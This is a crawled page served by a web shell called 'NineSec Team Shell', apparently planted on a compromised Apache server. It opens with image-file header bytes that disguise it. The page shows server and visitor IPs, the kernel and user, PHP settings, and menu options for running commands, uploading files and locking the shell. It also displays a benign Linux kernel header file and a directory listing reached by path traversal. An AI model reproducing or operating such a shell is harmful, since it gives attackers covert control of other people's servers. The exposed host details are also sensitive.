�����JFIF��������(ICC_PROFILE���������mntrRGB XYZ ������������acsp�������������������������������������-��������������������������������������������������� desc�������trXYZ��d���gXYZ��x���bXYZ������rTRC������(gTRC������(bTRC������(wtpt������cprt������ NineSec Team Shell
NineSec Team Shell
Server IP : 51.38.211.120  /  Your IP : 216.73.216.188
Web Server : Apache
System : Linux bob 5.15.85-1-pve #1 SMP PVE 5.15.85-1 (2023-02-01T00:00Z) x86_64
User : readytorun ( 1067)
PHP Version : 8.0.30
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF
Directory (0755) :  /etc/ldap/../etckeeper/../../usr/include/linux/usb/../netfilter_bridge/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : //etc/ldap/../etckeeper/../../usr/include/linux/usb/../netfilter_bridge/ebt_ip.h
/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
/*
 *  ebt_ip
 *
 *	Authors:
 *	Bart De Schuymer <bart.de.schuymer@pandora.be>
 *
 *  April, 2002
 *
 *  Changes:
 *    added ip-sport and ip-dport
 *    Innominate Security Technologies AG <mhopf@innominate.com>
 *    September, 2002
 */

#ifndef __LINUX_BRIDGE_EBT_IP_H
#define __LINUX_BRIDGE_EBT_IP_H

#include <linux/types.h>

#define EBT_IP_SOURCE 0x01
#define EBT_IP_DEST 0x02
#define EBT_IP_TOS 0x04
#define EBT_IP_PROTO 0x08
#define EBT_IP_SPORT 0x10
#define EBT_IP_DPORT 0x20
#define EBT_IP_ICMP 0x40
#define EBT_IP_IGMP 0x80
#define EBT_IP_MASK (EBT_IP_SOURCE | EBT_IP_DEST | EBT_IP_TOS | EBT_IP_PROTO |\
		     EBT_IP_SPORT | EBT_IP_DPORT | EBT_IP_ICMP | EBT_IP_IGMP)
#define EBT_IP_MATCH "ip"

/* the same values are used for the invflags */
struct ebt_ip_info {
	__be32 saddr;
	__be32 daddr;
	__be32 smsk;
	__be32 dmsk;
	__u8  tos;
	__u8  protocol;
	__u8  bitmask;
	__u8  invflags;
	union {
		__u16 sport[2];
		__u8 icmp_type[2];
		__u8 igmp_type[2];
	};
	union {
		__u16 dport[2];
		__u8 icmp_code[2];
	};
};

#endif

NineSec Team - 2022
Name
Size
Last Modified
Owner
Permissions
Options
..
--
February 12 2024 9:08:13
root
0755
ebt_802_3.h
1.244 KB
January 05 2024 2:59:41
root
0644
ebt_among.h
1.995 KB
January 05 2024 2:59:41
root
0644
ebt_arp.h
0.879 KB
January 05 2024 2:59:41
root
0644
ebt_arpreply.h
0.282 KB
January 05 2024 2:59:41
root
0644
ebt_ip.h
1.068 KB
January 05 2024 2:59:41
root
0644
ebt_ip6.h
1.031 KB
January 05 2024 2:59:41
root
0644
ebt_limit.h
0.602 KB
January 05 2024 2:59:41
root
0644
ebt_log.h
0.525 KB
January 05 2024 2:59:41
root
0644
ebt_mark_m.h
0.379 KB
January 05 2024 2:59:41
root
0644
ebt_mark_t.h
0.812 KB
January 05 2024 2:59:41
root
0644
ebt_nat.h
0.378 KB
January 05 2024 2:59:41
root
0644
ebt_nflog.h
0.498 KB
January 05 2024 2:59:41
root
0644
ebt_pkttype.h
0.261 KB
January 05 2024 2:59:41
root
0644
ebt_redirect.h
0.279 KB
January 05 2024 2:59:41
root
0644
ebt_stp.h
1.084 KB
January 05 2024 2:59:41
root
0644
ebt_vlan.h
0.702 KB
January 05 2024 2:59:41
root
0644
ebtables.h
9.09 KB
January 05 2024 2:59:41
root
0644

NineSec Team - 2022